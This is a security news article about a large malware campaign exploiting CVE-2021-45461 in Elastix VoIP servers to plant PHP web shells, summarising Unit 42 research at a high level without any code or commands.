Dedicated threat analysts recently discovered a large-scale malicious campaign designed to target Elastix Voice over Internet Protocol (VoIP) telephony servers. In just a three-month period, over 500,000 malware samples were recorded.

Developed for unified communication including email, faxing, instant messaging and Internet Protocol private branch exchange (IP PBX), Elastix is a dedicated server software utilised in the Digium phones module designed specifically for FreePBX.

An exploitive campaign unearthed

According to analysts at Unit 24 at Palo Alto Networks, the threat operators involved in the attack could have exploited the remote code execution vulnerability that was identified and tracked as CVE-2021-45461. Then vulnerability carries critical severity status with a 9.8 out of 10 rating.

Evidence suggests that malicious actors have been exploiting this known vulnerability since back in December last year and the recent cybercriminal campaign seems to be connected closely with the security issue.

Researchers at Unit 42 commented that the attackers’ aim was to implant a PHP web shell with the capability to run arbitrary commands on a communication server that had been compromised.

In a recent report, the Palo Alto Network researchers stated that from December 2021 to March 2022, the threat operator behind the attacks had deployed over 500,000 entirely unique malware samples from the same family.

Currently the threat operation remains active and shares multiple similarities to another campaign in 2020 that researchers at the Cybersecurity firm Check Point first reported.

Details of the attack

The analysts observed two separate attack groups employing different initial scripts for exploitation to deploy a small-scale shell script. The malicious code installs a PHP backdoor on the target’s device while creating root user accounts and ensuring persistence during scheduled tasks.

Commenting on this process, the Palo Alto Network team stated:

“This dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to that of a known file already on the system.”

The latest forms of malware are often designed with the ability to avoid detection by both users and security software, and often lie dormant for months before becoming active.

The IP addresses used by the attackers in both groups are based in the Netherlands. However, the DNS records also reveal links to multiple adult sites of Russian origin. At present, parts of the infrastructure for payload-delivery remain operational online.

The scheduled task created by the initial script launched runs every minute so it can fetch a PHP web shell with base64 encoding and is able to manage multiple incoming web requests, including remotely running arbitrary commands.

Additionally, the web shell features an extra set of built-in commands that allow directory listing, file reading, and reconnaissance of the open-source PBX platform Asterisk.

The recent report issued by Unit 42 also includes full technical details regarding how the malicious payloads are being dropped and tactics used to avoid detection on an existing environment. Several indicators of compromise listed also show local file paths the malware uses and hashes for scripts, along with unique strings and public URLs used to host the payloads.